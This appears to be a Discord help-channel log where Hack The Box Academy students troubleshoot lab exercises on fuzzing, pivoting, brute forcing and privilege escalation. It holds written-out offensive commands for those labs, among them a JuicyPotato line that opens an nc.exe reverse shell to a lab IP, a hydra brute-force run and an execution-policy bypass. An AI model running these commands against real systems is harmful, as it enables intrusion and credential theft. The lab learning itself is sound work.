#modules

According to what you posted above, you are on the Attacking Web Applications With FFUF Filtering Results section. When I review that section, the command they provide (like the wordlist) doesn't match up with what your command is. Are you on a different section now?

They're on the param fuzzing

no, im in parameter fuzzing

which one?

Ffuf module

there are 3 parameter fuzzing sections

GET

1st one

read the very first line on that section

you're fuzzing the wrong url

i'll die

Here's a wild guess

gotta go take some rest ig

Yeah lol

Miss the obvious things

fuckkkkkkkkk

AHHHHH

You're meant to fuzz the /admin/admin.php

The module builds off itself

So you're still attacking academy.htb as well

Not the ip, so to speak

yep, make sure you update your vhosts, make sure you're using the command they provide (adjusting for filtering by size or whatever you're filtering by)

one question

It also explicitly tells you which vhost you're attacking

ill be saving admin.academy.htb with the given server ip in my etc/hosts right?

Yes

Otherwise you won't be able to connect to it

so isn't attacking the ip the same as attacking the url?

No

The ip can have many urls

huh?

correct, the web server is going to return different results based off of the different vhosts it's hosting

Admin, www, students

Those would all be different vhosts on the same ip

The server handles the requests by seeing which resource you're requesting

Routing is done at the a.b.c level and resources on that vhost are at the /path/to/thing.extension

so hypothetically speaking admin.academy.htb is just admin.ip, more like a subdomain just that its not on the dns servers hence a vhost?

No

It's admin.academy.htb, it's own vhost on the ip

so what am i attacking since 2 hrs 💀 ?

the web server that's using that ip

so not the right target

The ip, not the vhost

a single IP address can host multiple websites using virtual hosts (vhosts). when a user visits a website, their browser sends the domain name as part of the request. The web server uses this domain name to determine which website's files to serve. Each website is configured as a virtual host, and the server directs the request to the correct site based on the domain, even though all sites share the same IP.

wtf

okay ig i got it

There's routing based on the configuration to route people to the right thing once they connect.
Your hosts file only tells your system that it exists and to connect to it
There's a server-side config that handles where to send you/what resources to use when you're browsing it

okay another question, so what is subdomain and how is it different from vhost and how is it related to server ip?

So it takes the request to the web server; checks what resource it's requesting [i.e. admin.academy.htb] and uses the configuration associated with that subdomain

Subdomains and vhosts are colloquially interchangeable, but technically different

ohh

domain.com is a domain, sub.domain.com is a subdomain

You don't know just by looking what's a vhost or not

a subdomain may or may not be a vhost running off the same webserer sharing the same ip, but it doesn't have to be

Hi, I need a help with the Firewall and IDS/IPS Evasion - Hard Lab

ohkk

Even the hint didn't work with me to answer:
Now our client wants to know if it is possible to find out the version of the running services. Identify the version of service our client was talking about and submit the flag as the answer.

Revisit the text, something about source ports

FINALLY FOUND THE PARAMETERRRRRRR

but btw why does all the param return 200 ?

See what happens when you attack the right thing?

Because the page exists

🥲

Just bc a param fails doesn't mean the page stops existing

wait im a little confused
all 6000 param returned 200 , but only one had a different size?

wait so does it work like
if the param exists then the given value will likely cause an error on the server
but if it doesnt exist itll just return 200 without causing any issue ?

No, the size is the key

no i mean because the param exists, its returning some data hence a change in the size

There's a response generated that either 'wrong parameter' or something along those lines, where the right parameter (but wrong value) will say something like 'invalid value'

Thus creating a size difference

It all depends on how the server responds to bad values

okay guess i used the wrong word , i mean wrong value in correct param

It will still throw 200, as that's just saying the page exists

okay i understand now

Which is why you can't solely rely on status code

Sometimes you might be able to dig into a 403, for instance

ohh

Or you might intentionally be trying to throw a 504

Lots of things

Which is one of the sub-lessons within the module that may not be explicitly told to you

Some modules have basically hidden lessons. Like password attacks, patience is key

hmm

@cloud urchin Can you help with evasion module?

i can try, dm me

I'm having issues with the Attacking Enterprise Networks module, specifically the last hoorah in he module to get into MGMT 01 with a double pivot. I do everything as specified in the text but it doesn't work the nmap scan displays port 22 as filtered instead of open and I can't ssh in

the socket just times out

Check the port in your proxychains configuration, additionally, if you are using the workstation try running some of the commands using sudo

how can i start a administrative powershell with the given creds ( they just dont work )

I am having a big problem in the Server Side Attacks Skills assesment. I found the SSRF but i cant get it to work

I dont remember for sure but I think there was some other way to abuse ssrf in there something thats not file://

could i dm someone how to get the intended way for the flag - skill assessment of "WEB SERVICE & API ATTACKS"? i ended up doing a code review to get the flag

Ah I see what you’re doing wrong

It has to do with ssti

I’ll never forget that flag

careful about spoiling content

something weird,i run a "sudo openvpn" then "curl ifconfig to get the target ip,but when i nmap i see port 22 is close,and i cant ssh to it

can someone help me with this?

did you specify the vpn config file ?

yep

can you send the commands you ran

or you can dm for keeping chat clean

I'm working on the final exercise of the File Upload module. Here's what I've got so far: exfiltrated the source code files. identified and bypassed the allow and deny list. Based on the code in upload.php.I know that it's renaming the file before it moves it to the final directory and I think I know where it's being uploaded to, however, when I try to check the file it returns a 'not found'... Obviously I'm missing something... Any advice?

Hey guys is academy slow for u

What do u mean why? Because your request includes that URL

Hey Zer0 I will tell u, but can u please tell me if Academy is being slow for u?

1. You accessed the API in the browser or something, or your burp has the redirect option turned on.

2. When the API saw the error, it redirected u to the error API

3. Im pretty sure that u can inject both APIs, but I cant remember

But if u send the desired API requests to repeater, they wont get redirected.

U can also send them to the organizer and keep them for later

stop reposting stuff that spoils contents of the module, it's over tier 0

here

just don't spoil content

it chose that one because it indicated a potential injection (from what i remember)

Hey everyone. i am working on the windows attacks and defense module and im trying to run the GP-GPPPassword but when i run the command on the target Import-Module .\Get-GPPPassword.ps1 i get an error saying that scripts was disabled on this system

Set-ExecutionPolicy bypass -scope process

oh perfect thank you. was that in a module? i dont remember seeing it.

It might be in a more fundamental module [but I also just used google]

oh. ill keep that in my notes. thanks!

Sometimes your best friend is google :)

yeah. i kinda get tunnel visioned and when i google stuff it gives me the answer to the whole section right away instead of just letting me know how to work past the first bump lol.

Instead google the issue you're facing, not the module you're working on

that is certainly one way of doing it. ill start implementing that method. thank you!

Your issue was generic enough a Google search came up full

i tend to overthink the simple stuff so thats just a part of my downfall at times.

help

With what?

What user account on the Domain Controller has many Event ID (4625) logon failures generated in rapid succession, which is indicative of a password brute forcing attack? The flag is the name of the user account.

When asking for help, don’t forget the module and section.

Did you actually try or are you just copy/pasting looking for the answer?

I tried all users but nothing is correct

Well did you get the event logs from the DC?

The DC is not the 10.129.x.x spawned target. It's another machine on that host's internal network

I'm sure I got it

?

I can't post pictures

Note, the user may not actually exist

So urgent

So if you're just trying usernames that are on the DC that's not gonna help you

Also as sparkling said, module and section name are very helpful

I tried the username from the beginning to the end of the log

Then you didn't log into the dc

¯_(ツ)_/¯

PS C:\Users\user10>

Tired

wat

Please read #welcome and #rules it will explain how to get verified

And please, without telling us the module and section, we can’t really help. There’s many modules

I'll eat first and then figure out how to post pictures

You need to link your htb account to be able to post images

Can you help me? I was too anxious just now.

The DC is given in another question

The given IP is NOT the domain controller

what should i do

Enter-PSSession -ComputerName <IP> -Credential <passwd> 这样吗？

Connect to the domain controller [given in an earlier question] and get the event log from that

Same as you did before [with user10's credentials]

I'll try

thank you

As noted by the question "which user account on the Domain Controller..."

Since all these questions are for the same environment, any info can be relevant

Can you explain further how to use the command line to find the name or IP of the server?

I’m stuck on Using CrackMapExec Finding Secrets and Using Them - Question: “What's the hash of the account named soti?” I’ve dumped all the hashes multiple time from the target machine and there is no account named Soti. I’ve run all of the commands from this module. What am I missing? Or is this a mistake in the module? Can someone give me some help? Thanks!

One of the other questions gives the IP

I solved my problem by using netexec insted of crackmapexec.

Yeah. Netexec is the evolution of crackmap

Cme is deprecated and no longer being maintained

nxc ftw

Try the aad part?

Try a different vpn region?

The go to fix when something ain't working XD

The vpn region controls how the targets (and related internal machines) spawn

Well where

Vpn region != pwnbox region

Should be a section above that

Box above "connect to pwnbox"

You should see it as PwnBox region

Thank you thank you I finally found him

Yep

Download new vpn and respawn lab

You'll need to kill your current vpn connection as well

And run the new one

Wrong, thats not what I was referring to

Make sure no errant spaces before or after

Or just refresh the page

The hash i have starts 49... try changing regions completely from US to EU (or vice versa), see if that changes anything

Hmm not sure what could be going wrong

thats not the parent domain

u can also use -just-dc-user for the user you want

oh i read the wrong thing

but its probably because of the vss method

you should just use the admin hash you got from the raisechild output

^

thats not the right IP

u cant secrets dump with the hash?

Use that admin hash to do the lookup

:))

Now you're thinking with portals

yes, thats a domain admin

Careful revealing content, since it's above t0

Some tools allow you to use the hash, no cracking required

I already deleted

Secretsdump as well iirc, it's been a minute.

--help should give you the list of things you can do

Since I've done it

majority if not all of impacket tools

And I'm relying more on memory than I am notes, no access to my rig atm

Most commands the hash is used with -H

You can also potentially use the tgt hash to just get a ticket for admin and do that fun stuff

if the tool uses impacket -hashes :<hash> is used instead most of the time

wrong domain

Again, careful with spoilers

I understand you're frustrated, but try and be mindful when sharing images that can contain hashes or other sensitive info.

Maybe if you used the right ip

@patent fable

Also stop half-assing your redactions

Ms-paint literally has a draw tool to draw boxes

It's literally just one of the "shapes" in mspaint

this reminds me of that one module where you had to keep attacking the page and eventually the answer showed up 😛

Lucky button

i was so mad at that module lol. i thought i was losing my marbles.

this one was annoying lol.

i was like....alright im going to do blue team stuff for a bit lol

Lol

STUCK
Module: File Transfer
We have access to the machine MS02, and we need to download a file from our Pwnbox machine. Let's see how we can accomplish this using multiple File Download methods.

Where is machine MS02 that I will connect?

I need help with windows priv escl , skill assessment!! part 1 , i tried multiple ways , juicypotato and other method to esclate privilege ??

Module: File Transfers
Microsoft documentation says WebClient is obsolete, instead use HttpClient.

-c flag

Still gets the job done

from what I remember juicypotato is the correct way, you just have to use a different CLSID.
you can go to their github and try their list of CLSID's from top to bottom, I think the first one worked for me If I remember correctly but if it didn't just try others.

i tried those but what i am doing wrong

i dont know really

should i download nc.exe??

jc.exe -l 1337 -p c:\Windows\System32\cmd.exe -t * -c "{CLSID}" -a "/c C:\Users\Public\nc.exe IP PORT -e cmd.exe"

this waht i am doing

yes, move nc.exe into the target

ok nice

windows doesn't come with nc installed

i tried windows 2016 server ?

PS C:\windows\temp> .\JuicyPotato -l 1337 -p c:\Windows\System32\cmd.exe -t * -c "{87BB326B-E4A0-4de1-94F0-B9F41D0C6059}" -a "/c C:\Users\Public\nc.exe 10.10.14.65 8443 -e cmd.exe"
Testing {87BB326B-E4A0-4de1-94F0-B9F41D0C6059} 1337
if anyone help what is going on
?

try adding a space before /c

ok

still PS C:\windows\temp> .\JuicyPotato -l 1337 -p c:\Windows\System32\cmd.exe -t * -c "{87BB326B-E4A0-4de1-94F0-B9F41D0C6059}" -a "
/c C:\Users\Public\nc.exe 10.10.14.65 8443 -e cmd.exeTesting {3ad05575-8857-4850-9277-11b85bdb8e09} 1337
COM -> recv failed with error: 10038
PS C:\windows\temp>

try another CLSID

Anyone help me in that

which section is this?

it is "Windows File Transfer Methods" in File transfer module.

bro this is part of the explanation, when you finish reading through it you can see a machine at the end that you can spawn and practice on.

Can I use Powershell tool in linux to practice these

or a dedicated windows environment is mandortary?

not sure if pwsh in linux is capable of performing file downloads/uploads like a windows machine as it's limited.
you can try and see yourself

Thanks mate for help.

no problem

Login Brute Forcing

Skills Assessment Part 1

Target : ||83.136.254.158:33116||

What is the password for the basic auth login?

||```bash
$ hydra -L /usr/share/wordlists/seclists/Usernames/top-usernames-shortlist.txt -P 2023-200_most_used_passwords.txt 83.136.254.158 http-get / -s 33116
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-12-26 02:58:13
[DATA] max 16 tasks per 1 server, overall 16 tasks, 17 login tries (l:17/p:1), ~2 tries per task
[DATA] attacking http-get://83.136.254.158:33116/
1 of 1 target completed, 0 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-12-26 02:58:13

I need your help. I think there's no error in my command, but I'm wondering if it's a wordlist problem. The wordlist given for the password doesn't work.

they provide you with usernames.txt and passwords.txt files in the same skills assessment.

use those

your command is not wrong but the wordlists are.

worked , thanks!!

Okay, but as I said, the wordlist password doesn't exist in github.

It exists but on a different branch.

https://github.com/danielmiessler/SecLists/blob/jhaddix-patch-1/Passwords/2023-200_most_used_passwords.txt

Thanks !!!

I was thinking about that too, I could have looked myself...

Hi folks

I'm stucked on Using Web Proxies module. To be precise, in the Web Fuzzer part.

I spaw the target, but don't get a valid response as in tutorial page.

Everything was working good, but sundely stoped working. Even the main page where we put IP or Commands in the beggining of the module started to get 404 error.

In Zap Fuzzer task I can't get a 200 OK response in http://SERVER_IP:PORT/skills/

I tried use curl and ffuf but nothing works.

Someone knowns how to resolve this kind behavior?

i've been facing problems with the target servers lately. I ssh into the machines, and they just stop responding. I transfer files like Chisel, the transfer gets stalled. I don't know what's happening. I have tried the PwnBox as well.

the dynamic port forwards don't work too.. although every configuration is correct, nor anything like Chisel helps. Its soo weird

Question: In the web requests module crude API's section , after deploying the target, I don’t think the server IP and port work. When I use curl, it doesn’t respond with any data, even though the header says 200 OK. Is this an issue on my end, or could it be a server issue?

Tips before take the exam??🫶🏻

Have fun

And take breaks every now and then

Pentesting nibbles: initial foothold I've gotten as far as being able to login to nibbleblog as admin but the last steps to actually gain a foothold get kind of confusing cause my plug-ins work but I can't get a response on netcat and not exactly sure how to run the python code based on the information given im a beginner HELP?

Yeahhh this is where I'm stuck. https://academy.hackthebox.com/module/77/section/852

What do you mean?

he's telling you to take breaks during the exam, as this can really help in the process.

Does revision help me a lot ?
I am feeling lost , i do not know

Actually I studied the course totally by myself

Without guide

if there's something that you did not fully grasp, then yes revise it.
if not, then reviewing what you already know won't really help that much.

If i take the exam using pwnbox , is that including the tools?

Not sure which exam you mean, the pwnbox has some things installed by default, but certainly not everything, and none of the windows tools you'll need for CPTS, that's up to you to have them prepared and transfer them. If you've been using it during the course, you'll know what it's missing.

Sounds good 👍🏻

Module: Attacking Common Applications
Section: Attacking Tomcat
Question: Obtain remote code execution on the http://web01.inlanefreight.local:8180 Tomcat instance. Find and submit the contents of tomcat_flag.txt

I have the webshell, i just cannot locate the flag

hey i am stuck at this que Use the user's credentials we found in the previous section and find out the credentials for MySQL. Submit the credentials as the answer. (Format: <username>:<password>) . i can ssh to the target and the target machine does not have hydra nor crackmapexec . i tired to transfer that to build hydra on target . it require make to compile and make is not present i tried to transfer make and i found out that make requre make to compile too .....🤧

i searched on forum and found that other people previously have hydra on target machine to do credential stuffing ....

To anyone who is stuck here, try to use find command to search for the flag

???????????

From which module and section is this?

module = password attacks , section = password reuse/default password

You dont need to use hydra or crackmapexec, the section's name might give some hint.

ok i will do that manually

Hello, anybody can help me to past trough 2step code?

This is not hacker for hire

We can’t help you with bypassing 2FA

Can u dm me for a min?

No. I won’t help bypassing 2FA

No, i have another question i got it. That’s illegal.

Then you can dm me 🙂

Unconstrained Delegation - Users

I am not able to get TGT, using the hash, receiving connection but no TGT, any ideas?

Hi im extremely new on these field im really” interested to study more about these field is there any roadmap for htb i mean for beginners?

Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible

Hey a flag in module is not showing where it should be where should i ask for help?

Try respawning the target and double check the location

Tried that dident work

Never mind found the problem

@storm elk thankyou so much well im not sure which to start off like which module since i do have some basics regarding linux and i do have vm also some basic knowledge on bash,python,java

I was getting the same error.
Someone said to specify the --target flag in the krbrelayx

Is there a way to search modules by the author?

no (but you can suggest /feedback

Hi,

Anyone faced the issue to solve File transfer > Linux file transfer > #2 Question?

I've
connected the ssh, upload the file, unzipped it

tried the following command

md5sum <extractedfile>

🙂 not working the following flagged

I mean the hash

well... the question tells you to use the tool 'hasher' on it

not md5sum

:)

O

obviously replacing <extracted file> with the filename

I've used hasher before, but got -bash: hasher: command not found

are you running it from the ssh target?

so thought I need to do this with md5sum

:)

oh wait

hihihihi

yeah yeah

I lost that connection,

https://tenor.com/view/tolarian-community-college-kyle-hill-magic-the-gathering-i-hate-your-deck-reading-the-card-gif-22381436

hahaha

by far one of the least ambiguous questions on academy

Hello everyone , I am unable to spawn a reverse shell (in MSSQL section) in the blind sql injection module. Did anyone encountered issue with it ? Or am i missing something (I tried every steps of the solution) ?

Respawning did the trick for me

Hi all, I am looking for a DEDICATED study partner (possibly partners) to study htb together with. I would like the partner to have vip as I will be doing a lot of retired labs and I plan on creating a schedule where we watch ippsecs insane boxes videos once a week, and we do academy another two or three times a week. If this sounds interesting to you and you have VIP and are in EU/US, then please DM me.

This is not the right place for this, kindly send this in #general

ok

Hi everyone, I think there’s a problem in the module Shells&Payloads. I’m at “The Live Engagement.” After I RDP’d into the foothold, I cannot ping 172.16.1.11. According to the question, I should be able to do so. According to the walkthrough I found on the internet, I should be able to do so as well. Has anyone experienced this as well?

respawn the target --> wait a few minutes

change vpn regions

Thank you! I will try this

also as a general tip; take note of the desktop 😉

it's an easy to miss detail

😃the credentials.txt?

yep; those will come in handy :)

(i'm referring to on the foothold)

Ohhh

Okie thank you!!

this general tip is good for 99.999% of times you RDP into a machine so many lost hours/minutes

Do you know if I should use the pwnbox or the vpn? The VPN servers only have US and EU. When I was in Boston it worked just fine but ever since I got to Toronto it’s insanely slow. The ping became 70+ms at best. There’s like US academy 1 through 6, and I don’t know which one would be closer to me. However there’s a lot of pwnbox locations, including Canada, but I feel like it’s still super slow😭I have to wait 1 second before what I typed shows up on the screen. Is this normal?

the delay doesn't mean much ¯_(ツ)_/¯

70ms is negligble

as long as its consistent delay you're not likely to notice it

it's not the lag that kills, it's the jitters

Thank You!! I can ping 172.16.1.11 now. You’re the GOAT.

Good morning, I'm new, I'm in the JavaScript Deobfuscation module, in the http request part, and I program with Windows, and I'm doing examples like this

curl -s http://SERVER_IP:PORT/ -X POST

and it doesn't take it, it seems like it throws me an error, so I don't know if it's because it works with another system like Linux or it's a mistake of mine directly

i'm assuming you're replacing the SERVER_IP:PORT with the given IP:PORT from "click here to spawn target"

also the question may give you a direct endpoint to curl

Yes, but it doesn't give me the IP:PORT

Target: Click here to spawn target! above the questions

you use that along with the endpoint in the question

also windows is kinda dumb when it comes to certain things; like json requests as well

no no eso no me refiero, me refiero a estos comandos de curl, que los pongo en una terminal y me da error

curl -s http://IP_SERVIDOR:PUERTO/ -X POST

ingles

Oh, I understand.

sorry, No no, that's not what I'm talking about, I'm talking about these curl commands, which I put in a terminal and I get an error

curl -s http://SERVER_IP:PORT/ -X POST

you replace the IP:PORT in the example with the IP:PORT from the questions

where it says IP:PORT, I have to put IP: and the number

for example if it says above the question; 1.2.3.4:5678 you do curl -s http://1.2.3.4:5678/ -X POST

Does any one pass through this question?
List the SMB shares available on the target host. Connect to the available share as the bob user. Once connected, access the folder called 'flag' and submit the contents of the flag.txt file.

Any hint about bob's password?

I'll check it out, I'll try, do you do all that with vsc?

?

visual studio code

i know what vsc is, not sure how that relates

read the section carefully

I just use the terminal (linux) or Commandline/Powershell (Windows)

okay question, for the last part where we double pivot in the attacking enterprise networks module, it says "Edit the /etc/proxychains.conf file to use port 9050 that we specified above. If you already have a line in there from earlier, comment it out or replace the port number."

I don't understand what this means, it's not working if I leave it at 9050

I have my ssh to the DMZ (10.129.98.114) tunneling via port 9050 and that is used by the evil-winrm session to the DC (172.16.8.3)

I didn't bother using proxychains for AEN

i used ligolo-ng as my pivoting tool

this is so confusing

i'm assuming you did the module reading everything instead of blind ¯_(ツ)_/¯

Ok, I understand, thank you very much

blind means just spin up the target; extend time as much as possible; get to DA or EA privs

AEN is very good for testing the methodology and notes you Should have gained from doing the CPTS course

but okay how would you do the double pivot then in theory?

use ligolo-ng and use port forwarding techniques

with ligolo it's as simple as setting it to call back to my listener

but with other tools that utilize proxychains i'm not as versed in syntaxes

ligolo-ng is kind of a C2-lite

¯_(ツ)_/¯

allows you to manage, forward, and mess with connections

-.- FINE

¯_(ツ)_/¯

i practiced pivoting with ligolo on the double pivot in the pivoting module

I will use ligolo and see about it; proxychains with the meterpreter is really frustrating. the curators should have a second look or elaborate what they mean by adjusting the proxychains.conf file

I take it you're reading the walkthrough?

because as far as im aware proxychains only works with 1 port at a time

yea

the walkthroughs are expecting you at this point to know what you're doing

they're good for sanity checks

but i wouldn't rely on them

it's explained pretty well in the pivoting module

if you have a preferred pivoting method just use that

instead of whatever the walkthrough says

though if you've used the walkthrough for this course as a whole, it might be best to go back through the modules and readjust your notes

it's ok to get stuck; the important thing is how you get yourself unstuck

I'm aware that it's using a local port forward on the DC, and a dynamic port forward on the DMZ, but the issue is that the dynamic port forward and the socks_proxy on metasploit are using the same port

utilizing the walkthrough as a crutch is bad because, for instance, on the exam there is no walkthrough

that shouldn't be an issue

well it is becuase every time you start the auxiliary socks proxy server it just shuts down in metasploit

you can do multipivots pointing to the same home port

you don't need to spin up multiple aux servers in msf

@fathom pendant since you used ligolo-ng before, how is it with double pivoting?
do you have to go through the process of setting up a separate "ligolo" interface on the target? or is there an easier route for this?

honestly with the latest version the creator made a ton of QoL changes

also you don't set up any interfaces on the target

all interfaces are handled on your server

great to know this ! as I only knew the tool from john hammond's video, so Ig I need to start reading some docs.

just make sure to run as sudo

or do the lazy thing chown root:root ligolo; sudo chmod +s ligolo

it seems this is what i'll do lol

because it requires some perms to create and manage interfaces

but there's commands within the tool to create interfaces and such so you don't need to do the whole rigamarole of "sudo ip ..." to create interfaces and manage connections

all documented on their wiki and such

I should really start researching lol, I only took the way john hammond set it up and noted it for the exam.

like i said; i practiced on the pivoting module double pivot section

and it worked fine

for windows, you may need to run Set-ExecutionPolicy bypass -Scope Process in powershell

I'll just practice on AEN as I'm starting it tomorrow.
If it did not have a double pivoting scenario I'll re-practice that in the pivoting module.

imo practicing it on a module that's sole purpose is pivoting will be better

I'm lazy....🫠

it should only take a minute to actually get it

i don't recall much to do with doubles in AEN

I cant log into prtg network monitor with the default credentials.... any help?

https://academy.hackthebox.com/module/113/section/1094

i took the screenshot from eyewitness + section and its just not letting me log in...

even on their official wiki they're using the sudo ip .... method, how did you figure the other one?
did you just type help for example and read the help message?

i mean that's a method but you don't need to do all that

there's the interface_create command

Hey i wanna start my journey towards becoming a hacker so can anyone guide me on how I start my journey with hack the box ..?

Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible

Probably the docs but there is also tab completion

i tried that.

of course i copied it wrong.... lol 😐

you owe me $100 for going to spin up pwnbox/target to sanity check (kidding)

as a note: make sure you read the username and passwords right if you're gonna copy/paste

i recommend not copy/pasting and writing yourself to get the idea/muscle memory

ligolo is working so far so good....

https://tenor.com/view/do-they-accept-monopoly-money-jeremy-assisted-living-s3e11-do-they-take-fake-money-gif-27037433

It worked! ligolo worked!

Hi guys, Im on bypassing web application protections for sqlmap and stuck on the first question for "case 8" of the module. I have tried what they've taught us in the section, but no luck

I intercepted the traffic with burp (after refreshing the page) and got the id and token

hi I'm doing protected archives section of password attacks module and there's only one question at the end. Anyway, I am following along with the section. I think there's something I'm doing off about this since its not quite working. I already gave rockyou.txt execute and read permissions. Here's what I have while following along aside from that:

└──╼ [★]$ cp /usr/share/wordlists/rockyou.txt .
┌─[us-academy-1]─[10.10.15.85]─[htb-ac-605555@htb-d7ataiw4xp]─[~]
└──╼ [★]$ john --wordlist=rockyou.txt zip.hash
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:00:01 DONE (2024-12-26 15:01) 0g/s 10101Kp/s 10101Kc/s 10101KC/s "2parrow"..*7¡Vamos!
Session completed. 
┌─[us-academy-1]─[10.10.15.85]─[htb-ac-605555@htb-d7ataiw4xp]─[~]
└──╼ [★]$ ls
cacert.der          Documents  Notes.zip  rockyou.txt  zip.hash
compressed_ext.txt  Downloads  Pictures   Templates
Desktop             Music      Public     Videos
┌─[us-academy-1]─[10.10.15.85]─[htb-ac-605555@htb-d7ataiw4xp]─[~]
└──╼ [★]$ cat compressed_ext.txt 
┌─[us-academy-1]─[10.10.15.85]─[htb-ac-605555@htb-d7ataiw4xp]─[~]
└──╼ [★]$ john zip.hash --show
0 password hashes cracked, 1 left

What do I do about this? why won't it work?

try using the mutated password list

ok

which one is that? is that on the new box?

is it premade or do I have to do mutations?

you have to do the mutations

ok

but all the stuff is given in the resources tab

which list do I mutate?

you reuse that list a bunch

ok I will look in resources

should be a zip file that has password; username; rules

I am stuck in final assessment of "Web Service & API Attacks". I already have made the soap request and request is also getting hanged. Which means i am on right tracks. Can anybody help me out with the SQLi payload? I am stuck from last 4 hours :/

Hi, can anyone pls help me wit this 😅

here is the problem

provided value for option '--csrf-token' is a regular expression? [y/N] y
[21:15:59] [INFO] testing connection to the target URL
[21:15:59] [CRITICAL] anti-CSRF token 'csrf-token' can't be found at 'http://83.136.254.158:47407/case8.php'. You can try to rerun by providing a valid value for option '--csrf-url'

okay i think i figured out the problem, which was to specify the token name as "t0ken"

actually no its not that because it keeps giving me the following error

Ok I did all of that and I thought I crackedthe password. However, it won't let me view the contents of the zip file. Here's my output:

┌─[us-academy-1]─[10.10.15.85]─[htb-ac-605555@htb-d7ataiw4xp]─[~] └──╼ [★]$ └──╼ [★]$ hashcat --force password.list -r custom.rule --stdout | sort -u | grep -vwE '\w{1,11}' > mut_password.list ┌─[us-academy-1]─[10.10.15.85]─[htb-ac-605555@htb-d7ataiw4xp]─[~] └──╼ [★]$ ls cacert.der custom.rule Documents Music mut_password.list Password-Attacks.zip Pictures rockyou.txt username.list zip.hash compressed_ext.txt Desktop Downloads mut_pass.txt Notes.zip password.list Public Templates Videos ┌─[us-academy-1]─[10.10.15.85]─[htb-ac-605555@htb-d7ataiw4xp]─[~] └──╼ [★]$ john --wordlist=./mut_password.list zip.hash Using default input encoding: UTF-8 Loaded 1 password hash (PKZIP [32/64]) Will run 4 OpenMP threads Press 'q' or Ctrl-C to abort, almost any other key for status 0g 0:00:00:00 DONE (2024-12-26 15:26) 0g/s 650700p/s 650700c/s 650700C/s ..<SNIP> Session completed. ┌─[us-academy-1]─[10.10.15.85]─[htb-ac-605555@htb-d7ataiw4xp]─[~] └──╼ [★]$ john --show zip.hash 0 password hashes cracked, 1 left

what is that grep for? LOL

you did an extra step in the mutated wordlist generation

ok hold on I did that because I had forgotten how to mutate wordlists

the full mutated list is around 96k words

iirc

you also don't need --force

ok password cracked. thanks

ok the problem was that I wasnt defining the cookie

I need a hint on Advanced XSS and CSRF Exploitation Skills Assessment, im at last step, ||trying to identify the SQLi point as i already discovered the hidden endpoint, but can't find anything related or any parameter, i only have the error invalid customer ID||. a hint will be much appreciated 🙂

Just leaving in case someone needs a hint for this as the question is poorly worded and I had the same issue. Use the provided wordlists and brute force ssh module at the specified port in your target and later ssh login on that port to get the flag.

attacking ssh is slow

but yeah provided wordlists >>>>>>>> everything else

im on case#10 for sql map and on the bypassing web application filter section. I am struggling a little bit with this question, could someone pls nudge me in the right direction?

Its not ssh the exercise is wrong completely. Someone needs to have a look at it from HTB Academy site, the exercise says to follow along by spawning the machine, the machine that is spun has no FTP service running and the mentioned ssh default port that the exercises tries to bruteforce supports public key authentication, not password based.

yeah you need to specify the given port

since it's a public docker container running a vulnerable thing on a specific port

the default ports on docker containers are locked down tight

this is true of any time htb gives you a public_ip:port

the scope of attack is solely the port on the given IP

Yeah but that should be mentioned in the exercise, not say the below and then go along another tangent, that's just a bad learning experience.

Kick-off

To follow along, start the target system via the question section at the bottom of the page.

it's mentioned in the intro to academy module

how to interact with docker containers/public containers:ports

¯_(ツ)_/¯

Do you really think people will remember that every time? A hint should be added for a reminder

Also each module is supposed to be standalone

if they had to add a reminder hint for everything the modules would be 10x longer

notes bro.. notes

the intro to academy module teaches you how to interact with academy

which is something you should always bear in mind

Again bad learning experience

while yes, the learning modules are standalone -- interacting with academy is a universal concept across the site

If multiple people are having the same issue, it should give you the hint

only a handful of people are having the issue ¯_(ツ)_/¯

not enough for them to need a fundamental change

but you can always feel free to provide /feedback

anyone have any idea?

very much not true. do you expect each module to go over basic commands like 'ls' 'whoami' etc? if each module assumed you knew nothing they would be way too big.

Thanks will try that next time

i mean you can do tht now, it's a command in the discord

Try the exercise

i've done the exercise, and so has Super i believe

it's also simple logic; if you're given an explicit port -- use the explicit port

if you're unsure how to specify a port with a tool <tool> --help or man <toolname>

Are you guys native english speakers? The exercise says this "Targeting the FTP Server" and mentions the module in the command too "-M ftp" which by logic will make the reader assume there should be an FTP port to try out and also then it shouldn't mention kick off the machine so you can follow along. I get the Intro Module mentions the interaction with specific port but its still a bad experience, that's all I am saying

i just ran a normal request

You think FTP can only run on 21?

yeah I tried sqlmp -u url and also it said something about ID

There is no FTP service running, that's the point

Also I intercepted the request with burp and there was ID at the end of the request

which module/section?

im a bit confused on this

Login Brute Forcing - Web services

oh i just put it in a request file

i see the confusion

Hello, how are you? I need all the help I can get with this question about Attacking Thick Client Applications:
"Perform an analysis of C:\Apps\Restart-OracleService.exe and identify the credentials hidden within its source code. Submit the answer using the format username:password."
I've been stuck for several days, help me please!!!!!!

you're assuming that because the name of the user is ftpuser; that it's meant to attack ftp

You're wrong. There is an FTP service running.

Which port?

ok let me try that

Did you try running the commands given in the module to find the port?

Yeah nmap scan gives no FTP service running as the other user already mentioned too

Hello, how are you? I need all the help I can get with this question about Attacking Thick Client Applications:
"Perform an analysis of C:\Apps\Restart-OracleService.exe and identify the credentials hidden within its source code. Submit the answer using the format username:password."
I've been stuck for several days, help me please!!!!!!

[22:25:15] [WARNING] if the problem persists please check that the provided target URL is reachable. In case that it is, you can try to rerun with switch '--random-agent' and/or proxy switches ('--proxy', '--proxy-file'...)
[22:25:15] [CRITICAL] unable to connect to the target URL ('Connection refused')

@safe star do u have any idea 😅 :/ ?

and the other command it gives showed nothing?

I tried this

Which other command are you referring to?

sqlmap -r req.txt -T flag10 --dump --batch

the first one.

If you're not seeing a FTP service running maybe change regions, it could be that something is wrong with the box. I was able to do this with the commands given in the section. Honestly didn't even have to scan for the port.

dm the request

alr cool, thanks

I will give that a try too

actually nm

that's not even on the VPN

it's a docker container

i can't spawn it to test for you right now, but if it's really not there you can report it in #1234357888114364508.

i'd wager you're just missing something though.

re-read the section and try the other command it provides to find running services.

careful not to post module content

How was FTP attacked in the section?

your post had it right there, so it looks like it's working

that's not the issue tbh
